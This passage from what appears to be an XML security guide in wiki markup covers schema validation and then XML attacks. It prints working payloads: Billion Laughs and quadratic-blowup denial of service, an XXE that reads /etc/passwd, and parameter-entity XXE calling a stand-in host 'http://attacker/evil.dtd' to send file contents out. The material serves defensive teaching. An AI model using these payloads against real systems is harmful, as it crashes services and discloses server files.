Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
